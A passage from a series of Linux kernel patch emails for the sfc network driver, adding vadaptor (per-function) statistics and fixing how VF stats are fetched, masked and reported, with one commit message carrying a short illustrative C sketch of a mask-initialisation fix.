S. 
Miller --- drivers/net/ethernet/sfc/ef10.c | 39 +++++++++++++++++++++++++--- drivers/net/ethernet/sfc/mcdi_pcol.h | 20 ++++++++++++++ drivers/net/ethernet/sfc/nic.h | 18 +++++++++++++ 3 files changed, 73 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index f44a56a68f3a..3da554f848bc 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1046,6 +1046,24 @@ static const struct efx_hw_stat_desc efx_ef10_stat_desc[EF10_STAT_COUNT] = { EF10_DMA_STAT(port_rx_dp_streaming_packets, RXDP_STREAMING_PKTS), EF10_DMA_STAT(port_rx_dp_hlb_fetch, RXDP_HLB_FETCH_CONDITIONS), EF10_DMA_STAT(port_rx_dp_hlb_wait, RXDP_HLB_WAIT_CONDITIONS), + EF10_DMA_STAT(rx_unicast, VADAPTER_RX_UNICAST_PACKETS), + EF10_DMA_STAT(rx_unicast_bytes, VADAPTER_RX_UNICAST_BYTES), + EF10_DMA_STAT(rx_multicast, VADAPTER_RX_MULTICAST_PACKETS), + EF10_DMA_STAT(rx_multicast_bytes, VADAPTER_RX_MULTICAST_BYTES), + EF10_DMA_STAT(rx_broadcast, VADAPTER_RX_BROADCAST_PACKETS), + EF10_DMA_STAT(rx_broadcast_bytes, VADAPTER_RX_BROADCAST_BYTES), + EF10_DMA_STAT(rx_bad, VADAPTER_RX_BAD_PACKETS), + EF10_DMA_STAT(rx_bad_bytes, VADAPTER_RX_BAD_BYTES), + EF10_DMA_STAT(rx_overflow, VADAPTER_RX_OVERFLOW), + EF10_DMA_STAT(tx_unicast, VADAPTER_TX_UNICAST_PACKETS), + EF10_DMA_STAT(tx_unicast_bytes, VADAPTER_TX_UNICAST_BYTES), + EF10_DMA_STAT(tx_multicast, VADAPTER_TX_MULTICAST_PACKETS), + EF10_DMA_STAT(tx_multicast_bytes, VADAPTER_TX_MULTICAST_BYTES), + EF10_DMA_STAT(tx_broadcast, VADAPTER_TX_BROADCAST_PACKETS), + EF10_DMA_STAT(tx_broadcast_bytes, VADAPTER_TX_BROADCAST_BYTES), + EF10_DMA_STAT(tx_bad, VADAPTER_TX_BAD_PACKETS), + EF10_DMA_STAT(tx_bad_bytes, VADAPTER_TX_BAD_BYTES), + EF10_DMA_STAT(tx_overflow, VADAPTER_TX_OVERFLOW), }; #define HUNT_COMMON_STAT_MASK ((1ULL << EF10_STAT_port_tx_bytes) | \ @@ -1126,6 +1144,10 @@ static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) u32 port_caps = efx_mcdi_phy_get_caps(efx); struct efx_ef10_nic_data *nic_data = efx->nic_data; + if (!(efx->mcdi->fn_flags & + 1 << MC_CMD_DRV_ATTACH_EXT_OUT_FLAG_LINKCTRL)) + return 0; + if (port_caps & (1 << MC_CMD_PHY_CAP_40000FDX_LBN)) raw_mask |= HUNT_40G_EXTRA_STAT_MASK; else @@ -1140,13 +1162,22 @@ static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) static void efx_ef10_get_stat_mask(struct efx_nic *efx, unsigned long *mask) { - u64 raw_mask = efx_ef10_raw_stat_mask(efx); + u64 raw_mask[2]; + + raw_mask[0] = efx_ef10_raw_stat_mask(efx); + + /* All functions see the vadaptor stats */ + raw_mask[0] |= ~((1ULL << EF10_STAT_rx_unicast) - 1); + raw_mask[1] = (1ULL << (EF10_STAT_COUNT - 63)) - 1; #if BITS_PER_LONG == 64 - mask[0] = raw_mask; + mask[0] = raw_mask[0]; + mask[1] = raw_mask[1]; #else - mask[0] = raw_mask & 0xffffffff; - mask[1] = raw_mask >> 32; + mask[0] = raw_mask[0] & 0xffffffff; + mask[1] = raw_mask[0] >> 32; + mask[2] = raw_mask[1] & 0xffffffff; + mask[3] = raw_mask[1] >> 32; #endif } diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 1e11bb8a95a3..0e497b36f53e 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -2896,6 +2896,26 @@ * descriptor fetch. Valid for EF10 with PM_AND_RXDP_COUNTERS capability only. 
*/ #define MC_CMD_MAC_RXDP_HLB_WAIT_CONDITIONS 0x48 +#define MC_CMD_MAC_VADAPTER_RX_DMABUF_START 0x4c /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_UNICAST_PACKETS 0x4c /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_UNICAST_BYTES 0x4d /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_MULTICAST_PACKETS 0x4e /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_MULTICAST_BYTES 0x4f /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BROADCAST_PACKETS 0x50 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BROADCAST_BYTES 0x51 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BAD_PACKETS 0x52 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BAD_BYTES 0x53 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_OVERFLOW 0x54 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_DMABUF_START 0x57 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_UNICAST_PACKETS 0x57 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_UNICAST_BYTES 0x58 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_MULTICAST_PACKETS 0x59 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_MULTICAST_BYTES 0x5a /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BROADCAST_PACKETS 0x5b /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BROADCAST_BYTES 0x5c /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BAD_PACKETS 0x5d /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BAD_BYTES 0x5e /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_OVERFLOW 0x5f /* enum */ /* enum: Start of GMAC stats buffer space, for Siena only. */ #define MC_CMD_GMAC_DMABUF_START 0x40 /* enum: End of GMAC stats buffer space, for Siena only. */ diff --git a/drivers/net/ethernet/sfc/nic.h b/drivers/net/ethernet/sfc/nic.h index 8b69a31a0ee4..31ff9084d9a4 100644 --- a/drivers/net/ethernet/sfc/nic.h +++ b/drivers/net/ethernet/sfc/nic.h @@ -460,6 +460,24 @@ enum { EF10_STAT_port_rx_dp_streaming_packets, EF10_STAT_port_rx_dp_hlb_fetch, EF10_STAT_port_rx_dp_hlb_wait, + EF10_STAT_rx_unicast, + EF10_STAT_rx_unicast_bytes, + EF10_STAT_rx_multicast, + EF10_STAT_rx_multicast_bytes, + EF10_STAT_rx_broadcast, + EF10_STAT_rx_broadcast_bytes, + EF10_STAT_rx_bad, + EF10_STAT_rx_bad_bytes, + EF10_STAT_rx_overflow, + EF10_STAT_tx_unicast, + EF10_STAT_tx_unicast_bytes, + EF10_STAT_tx_multicast, + EF10_STAT_tx_multicast_bytes, + EF10_STAT_tx_broadcast, + EF10_STAT_tx_broadcast_bytes, + EF10_STAT_tx_bad, + EF10_STAT_tx_bad_bytes, + EF10_STAT_tx_overflow, EF10_STAT_COUNT }; From d778819609a27efd5358da8151a0ad3507243e19 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:20 +0100 Subject: [PATCH 607/872] sfc: DMA the VF stats only when requested Firmware does not support a periodic DMA of vadaptor-stats on VFs, so only update the stats buffer when stats are requested (when running "ethtool -S" or an ip/ifconfig command that reports stats). Signed-off-by: Shradha Shah Signed-off-by: David S. 
Miller --- drivers/net/ethernet/sfc/ef10.c | 149 ++++++++++++++++++++------- drivers/net/ethernet/sfc/mcdi_pcol.h | 4 +- 2 files changed, 112 insertions(+), 41 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 3da554f848bc..e5fe3b6fe8e2 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1190,7 +1190,50 @@ static size_t efx_ef10_describe_stats(struct efx_nic *efx, u8 *names) mask, names); } -static int efx_ef10_try_update_nic_stats(struct efx_nic *efx) +static size_t efx_ef10_update_stats_common(struct efx_nic *efx, u64 *full_stats, + struct rtnl_link_stats64 *core_stats) +{ + DECLARE_BITMAP(mask, EF10_STAT_COUNT); + struct efx_ef10_nic_data *nic_data = efx->nic_data; + u64 *stats = nic_data->stats; + size_t stats_count = 0, index; + + efx_ef10_get_stat_mask(efx, mask); + + if (full_stats) { + for_each_set_bit(index, mask, EF10_STAT_COUNT) { + if (efx_ef10_stat_desc[index].name) { + *full_stats++ = stats[index]; + ++stats_count; + } + } + } + + if (core_stats) { + core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; + core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; + core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; + core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; + core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + + stats[GENERIC_STAT_rx_nodesc_trunc] + + stats[GENERIC_STAT_rx_noskb_drops]; + core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; + core_stats->rx_length_errors = + stats[EF10_STAT_port_rx_gtjumbo] + + stats[EF10_STAT_port_rx_length_error]; + core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; + core_stats->rx_frame_errors = + stats[EF10_STAT_port_rx_align_error]; + core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; + core_stats->rx_errors = (core_stats->rx_length_errors + + core_stats->rx_crc_errors + + core_stats->rx_frame_errors); + } + + return stats_count; +} + +static int efx_ef10_try_update_nic_stats_pf(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data = efx->nic_data; DECLARE_BITMAP(mask, EF10_STAT_COUNT); @@ -1227,57 +1270,83 @@ static int efx_ef10_try_update_nic_stats(struct efx_nic *efx) } -static size_t efx_ef10_update_stats(struct efx_nic *efx, u64 *full_stats, - struct rtnl_link_stats64 *core_stats) +static size_t efx_ef10_update_stats_pf(struct efx_nic *efx, u64 *full_stats, + struct rtnl_link_stats64 *core_stats) { - DECLARE_BITMAP(mask, EF10_STAT_COUNT); - struct efx_ef10_nic_data *nic_data = efx->nic_data; - u64 *stats = nic_data->stats; - size_t stats_count = 0, index; int retry; - efx_ef10_get_stat_mask(efx, mask); - /* If we're unlucky enough to read statistics during the DMA, wait * up to 10ms for it to finish (typically takes <500us) */ for (retry = 0; retry < 100; ++retry) { - if (efx_ef10_try_update_nic_stats(efx) == 0) + if (efx_ef10_try_update_nic_stats_pf(efx) == 0) break; udelay(100); } - if (full_stats) { - for_each_set_bit(index, mask, EF10_STAT_COUNT) { - if (efx_ef10_stat_desc[index].name) { - *full_stats++ = stats[index]; - ++stats_count; - } - } - } + return efx_ef10_update_stats_common(efx, full_stats, core_stats); +} - if (core_stats) { - core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; - core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; - core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; - core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; - core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + - stats[GENERIC_STAT_rx_nodesc_trunc] + - 
stats[GENERIC_STAT_rx_noskb_drops]; - core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; - core_stats->rx_length_errors = - stats[EF10_STAT_port_rx_gtjumbo] + - stats[EF10_STAT_port_rx_length_error]; - core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; - core_stats->rx_frame_errors = - stats[EF10_STAT_port_rx_align_error]; - core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; - core_stats->rx_errors = (core_stats->rx_length_errors + - core_stats->rx_crc_errors + - core_stats->rx_frame_errors); +static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) +{ + MCDI_DECLARE_BUF(inbuf, MC_CMD_MAC_STATS_IN_LEN); + struct efx_ef10_nic_data *nic_data = efx->nic_data; + DECLARE_BITMAP(mask, EF10_STAT_COUNT); + __le64 generation_start, generation_end; + u64 *stats = nic_data->stats; + u32 dma_len = MC_CMD_MAC_NSTATS * sizeof(u64); + struct efx_buffer stats_buf; + __le64 *dma_stats; + int rc; + + efx_ef10_get_stat_mask(efx, mask); + + rc = efx_nic_alloc_buffer(efx, &stats_buf, dma_len, GFP_ATOMIC); + if (rc) + return rc; + + dma_stats = stats_buf.addr; + dma_stats[MC_CMD_MAC_GENERATION_END] = EFX_MC_STATS_GENERATION_INVALID; + + MCDI_SET_QWORD(inbuf, MAC_STATS_IN_DMA_ADDR, stats_buf.dma_addr); + MCDI_POPULATE_DWORD_1(inbuf, MAC_STATS_IN_CMD, + MAC_STATS_IN_DMA, true); + MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); + MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); + + spin_unlock_bh(&efx->stats_lock); + rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, + 0, NULL); + spin_lock_bh(&efx->stats_lock); + if (rc) + goto out; + + generation_end = dma_stats[MC_CMD_MAC_GENERATION_END]; + if (generation_end == EFX_MC_STATS_GENERATION_INVALID) + goto out; + rmb(); + efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT, mask, + stats, stats_buf.addr, false); + rmb(); + generation_start = dma_stats[MC_CMD_MAC_GENERATION_START]; + if (generation_end != generation_start) { + rc = -EAGAIN; + goto out; } - return stats_count; + efx_update_sw_stats(efx, stats); +out: + efx_nic_free_buffer(efx, &stats_buf); + return rc; +} + +static size_t efx_ef10_update_stats_vf(struct efx_nic *efx, u64 *full_stats, + struct rtnl_link_stats64 *core_stats) +{ + if (efx_ef10_try_update_nic_stats_vf(efx)) + return 0; + + return efx_ef10_update_stats_common(efx, full_stats, core_stats); } static void efx_ef10_push_irq_moderation(struct efx_channel *channel) @@ -4122,7 +4191,7 @@ const struct efx_nic_type efx_hunt_a0_vf_nic_type = { .prepare_flr = efx_ef10_prepare_flr, .finish_flr = efx_port_dummy_op_void, .describe_stats = efx_ef10_describe_stats, - .update_stats = efx_ef10_update_stats, + .update_stats = efx_ef10_update_stats_vf, .start_stats = efx_port_dummy_op_void, .pull_stats = efx_port_dummy_op_void, .stop_stats = efx_port_dummy_op_void, @@ -4224,7 +4293,7 @@ const struct efx_nic_type efx_hunt_a0_nic_type = { .prepare_flr = efx_ef10_prepare_flr, .finish_flr = efx_port_dummy_op_void, .describe_stats = efx_ef10_describe_stats, - .update_stats = efx_ef10_update_stats, + .update_stats = efx_ef10_update_stats_pf, .start_stats = efx_mcdi_mac_start_stats, .pull_stats = efx_mcdi_mac_pull_stats, .stop_stats = efx_mcdi_mac_stop_stats, diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 0e497b36f53e..181978d64845 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -2755,7 +2755,7 @@ #define MC_CMD_0x2e_PRIVILEGE_CTG SRIOV_CTG_GENERAL /* MC_CMD_MAC_STATS_IN msgrequest */ 
-#define MC_CMD_MAC_STATS_IN_LEN 16 +#define MC_CMD_MAC_STATS_IN_LEN 20 /* ??? */ #define MC_CMD_MAC_STATS_IN_DMA_ADDR_OFST 0 #define MC_CMD_MAC_STATS_IN_DMA_ADDR_LEN 8 @@ -2777,6 +2777,8 @@ #define MC_CMD_MAC_STATS_IN_PERIOD_MS_LBN 16 #define MC_CMD_MAC_STATS_IN_PERIOD_MS_WIDTH 16 #define MC_CMD_MAC_STATS_IN_DMA_LEN_OFST 12 +/* port id so vadapter stats can be provided */ +#define MC_CMD_MAC_STATS_IN_PORT_ID_OFST 16 /* MC_CMD_MAC_STATS_OUT_DMA msgresponse */ #define MC_CMD_MAC_STATS_OUT_DMA_LEN 0 From 0fc95fca5a95170a3615557218d98b6dff52ad36 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:33 +0100 Subject: [PATCH 608/872] sfc: update netdevice statistics to use vadaptor stats The netdevice statistics (in /proc/net/dev) are per-function stats so they must use the vadaptor stats. Change the use of MAC stats to vadaptor stats, and remove any statistics that can only be measured per-port. All stats that are removed will be shown as zeroes when these statistics are displayed. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 41 ++++++++++++++++++--------------- 1 file changed, 22 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index e5fe3b6fe8e2..b880d984a649 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1210,24 +1210,25 @@ static size_t efx_ef10_update_stats_common(struct efx_nic *efx, u64 *full_stats, } if (core_stats) { - core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; - core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; - core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; - core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; - core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + - stats[GENERIC_STAT_rx_nodesc_trunc] + + core_stats->rx_packets = stats[EF10_STAT_rx_unicast] + + stats[EF10_STAT_rx_multicast] + + stats[EF10_STAT_rx_broadcast]; + core_stats->tx_packets = stats[EF10_STAT_tx_unicast] + + stats[EF10_STAT_tx_multicast] + + stats[EF10_STAT_tx_broadcast]; + core_stats->rx_bytes = stats[EF10_STAT_rx_unicast_bytes] + + stats[EF10_STAT_rx_multicast_bytes] + + stats[EF10_STAT_rx_broadcast_bytes]; + core_stats->tx_bytes = stats[EF10_STAT_tx_unicast_bytes] + + stats[EF10_STAT_tx_multicast_bytes] + + stats[EF10_STAT_tx_broadcast_bytes]; + core_stats->rx_dropped = stats[GENERIC_STAT_rx_nodesc_trunc] + stats[GENERIC_STAT_rx_noskb_drops]; - core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; - core_stats->rx_length_errors = - stats[EF10_STAT_port_rx_gtjumbo] + - stats[EF10_STAT_port_rx_length_error]; - core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; - core_stats->rx_frame_errors = - stats[EF10_STAT_port_rx_align_error]; - core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; - core_stats->rx_errors = (core_stats->rx_length_errors + - core_stats->rx_crc_errors + - core_stats->rx_frame_errors); + core_stats->multicast = stats[EF10_STAT_rx_multicast]; + core_stats->rx_crc_errors = stats[EF10_STAT_rx_bad]; + core_stats->rx_fifo_errors = stats[EF10_STAT_rx_overflow]; + core_stats->rx_errors = core_stats->rx_crc_errors; + core_stats->tx_errors = stats[EF10_STAT_tx_bad]; } return stats_count; @@ -1310,7 +1311,7 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) MCDI_SET_QWORD(inbuf, MAC_STATS_IN_DMA_ADDR, stats_buf.dma_addr); MCDI_POPULATE_DWORD_1(inbuf, MAC_STATS_IN_CMD, - MAC_STATS_IN_DMA, true); + MAC_STATS_IN_DMA, 1); MCDI_SET_DWORD(inbuf, 
MAC_STATS_IN_DMA_LEN, dma_len); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); @@ -1322,8 +1323,10 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) goto out; generation_end = dma_stats[MC_CMD_MAC_GENERATION_END]; - if (generation_end == EFX_MC_STATS_GENERATION_INVALID) + if (generation_end == EFX_MC_STATS_GENERATION_INVALID) { + WARN_ON_ONCE(1); goto out; + } rmb(); efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT, mask, stats, stats_buf.addr, false); From 6dd4859b281700a163caec8ae7826c2558290127 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:49 +0100 Subject: [PATCH 609/872] sfc: suppress ENOENT error messages from MC_CMD_MAC_STATS MC_CMD_MAC_STATS can be called on a function before a vadaptor has been created, as the kernel can call into this through ndo_get_stats/ndo_get_stats64. If MC_CMD_MAC_STATS is called before the DMA queues have been setup, so that a vadaptor has not been created yet, firmware will return ENOENT. This is expected, so suppress the MCDI error message in this case. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 11 ++++++++--- drivers/net/ethernet/sfc/mcdi_port.c | 8 ++++++-- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index b880d984a649..a79a24f94123 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1316,11 +1316,16 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); spin_unlock_bh(&efx->stats_lock); - rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, - 0, NULL); + rc = efx_mcdi_rpc_quiet(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), + NULL, 0, NULL); spin_lock_bh(&efx->stats_lock); - if (rc) + if (rc) { + /* Expect ENOENT if DMA queues have not been set up */ + if (rc != -ENOENT || atomic_read(&efx->active_queues)) + efx_mcdi_display_error(efx, MC_CMD_MAC_STATS, + sizeof(inbuf), NULL, 0, rc); goto out; + } generation_end = dma_stats[MC_CMD_MAC_GENERATION_END]; if (generation_end == EFX_MC_STATS_GENERATION_INVALID) { diff --git a/drivers/net/ethernet/sfc/mcdi_port.c b/drivers/net/ethernet/sfc/mcdi_port.c index fffc34888c02..7f295c4d7b80 100644 --- a/drivers/net/ethernet/sfc/mcdi_port.c +++ b/drivers/net/ethernet/sfc/mcdi_port.c @@ -948,8 +948,12 @@ static int efx_mcdi_mac_stats(struct efx_nic *efx, MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, nic_data->vport_id); - rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), - NULL, 0, NULL); + rc = efx_mcdi_rpc_quiet(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), + NULL, 0, NULL); + /* Expect ENOENT if DMA queues have not been set up */ + if (rc && (rc != -ENOENT || atomic_read(&efx->active_queues))) + efx_mcdi_display_error(efx, MC_CMD_MAC_STATS, sizeof(inbuf), + NULL, 0, rc); return rc; } From d94619cdfc561eee18e2d40ab6563e3f2f072fdd Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:05 +0100 Subject: [PATCH 610/872] sfc: suppress vadaptor stats when EVB is not present The raw_mask array is not initialised, so it needs to be explicitly set to zero in the 'else' branch. If the EVB capability is not present, a port cannot have multiple functions so the per-port MAC stats are correct and should match the corresponding vadaptor stats, so this redundancy can be removed from the ethtool stats output. 
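
As a minimal user-space sketch of the pattern this fixes (hypothetical names only, not sfc driver code): raw_mask is a local two-word array, so the second word holds stack garbage unless every branch assigns it; the fix is the explicit zero in the 'else' branch when the EVB capability is absent.

/*
 * Illustrative sketch -- names are invented, not the sfc driver API.
 * build_stat_mask() mirrors the shape of the fix: the branch that has
 * no vadaptor stats must still assign raw_mask[1] explicitly.
 */
#include <stdint.h>
#include <stdio.h>

#define CAP_EVB (1u << 30)	/* stand-in for the EVB capability bit */

static void build_stat_mask(uint32_t datapath_caps, uint64_t raw_mask[2])
{
	raw_mask[0] = 0xffffULL;	/* per-port MAC stats, always present */

	if (datapath_caps & CAP_EVB)
		raw_mask[1] = 0x3ULL;	/* vadaptor stats exist */
	else
		raw_mask[1] = 0;	/* no EVB: zero it, don't leave garbage */
}

int main(void)
{
	uint64_t mask[2];

	build_stat_mask(0, mask);	/* EVB capability absent */
	printf("mask[0]=%#llx mask[1]=%#llx\n",
	       (unsigned long long)mask[0], (unsigned long long)mask[1]);
	return 0;
}
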
Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 12 +++++++++--- drivers/net/ethernet/sfc/mcdi_pcol.h | 2 ++ 2 files changed, 11 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index a79a24f94123..03f464fdd2b9 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1162,13 +1162,19 @@ static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) static void efx_ef10_get_stat_mask(struct efx_nic *efx, unsigned long *mask) { + struct efx_ef10_nic_data *nic_data = efx->nic_data; u64 raw_mask[2]; raw_mask[0] = efx_ef10_raw_stat_mask(efx); - /* All functions see the vadaptor stats */ - raw_mask[0] |= ~((1ULL << EF10_STAT_rx_unicast) - 1); - raw_mask[1] = (1ULL << (EF10_STAT_COUNT - 63)) - 1; + /* Only show vadaptor stats when EVB capability is present */ + if (nic_data->datapath_caps & + (1 << MC_CMD_GET_CAPABILITIES_OUT_EVB_LBN)) { + raw_mask[0] |= ~((1ULL << EF10_STAT_rx_unicast) - 1); + raw_mask[1] = (1ULL << (EF10_STAT_COUNT - 63)) - 1; + } else { + raw_mask[1] = 0; + } #if BITS_PER_LONG == 64 mask[0] = raw_mask[0]; diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 181978d64845..45fca9fc66b7 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -5600,6 +5600,8 @@ #define MC_CMD_GET_CAPABILITIES_OUT_MCAST_FILTER_CHAINING_WIDTH 1 #define MC_CMD_GET_CAPABILITIES_OUT_PM_AND_RXDP_COUNTERS_LBN 27 #define MC_CMD_GET_CAPABILITIES_OUT_PM_AND_RXDP_COUNTERS_WIDTH 1 +#define MC_CMD_GET_CAPABILITIES_OUT_EVB_LBN 30 +#define MC_CMD_GET_CAPABILITIES_OUT_EVB_WIDTH 1 /* RxDPCPU firmware id. */ #define MC_CMD_GET_CAPABILITIES_OUT_RX_DPCPU_FW_ID_OFST 4 #define MC_CMD_GET_CAPABILITIES_OUT_RX_DPCPU_FW_ID_LEN 2 From f00bf2305cabc2313c70575384aee60e8f2a684d Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:18 +0100 Subject: [PATCH 611/872] sfc: don't update stats on VF when called in atomic context The ifenslave command to set up a bond runs in an atomic context, and it queries the stats on the devices that are being enslaved. A VF needs to make an MCDI call to update its stats, which is not allowed in atomic context. The releasing of the stats_lock is moved to the beginning of the VF stats update function so that in_interrupt() can be used; it must be taken again before returning from this function. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 03f464fdd2b9..6b8d8f254515 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1306,11 +1306,24 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) __le64 *dma_stats; int rc; + spin_unlock_bh(&efx->stats_lock); + + if (in_interrupt()) { + /* If in atomic context, cannot update stats. Just update the + * software stats and return so the caller can continue. 
+ */ + spin_lock_bh(&efx->stats_lock); + efx_update_sw_stats(efx, stats); + return 0; + } + efx_ef10_get_stat_mask(efx, mask); rc = efx_nic_alloc_buffer(efx, &stats_buf, dma_len, GFP_ATOMIC); - if (rc) + if (rc) { + spin_lock_bh(&efx->stats_lock); return rc; + } dma_stats = stats_buf.addr; dma_stats[MC_CMD_MAC_GENERATION_END] = EFX_MC_STATS_GENERATION_INVALID; @@ -1321,7 +1334,6 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); - spin_unlock_bh(&efx->stats_lock); rc = efx_mcdi_rpc_quiet(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, 0, NULL); spin_lock_bh(&efx->stats_lock); From 71158bf2e748e2710616f59a823619af3c5505a7 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:31 +0100 Subject: [PATCH 612/872] sfc: do not allow VFs to be destroyed if assigned to guests Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10_sriov.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index cd524543c363..083c534bc4ec 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ 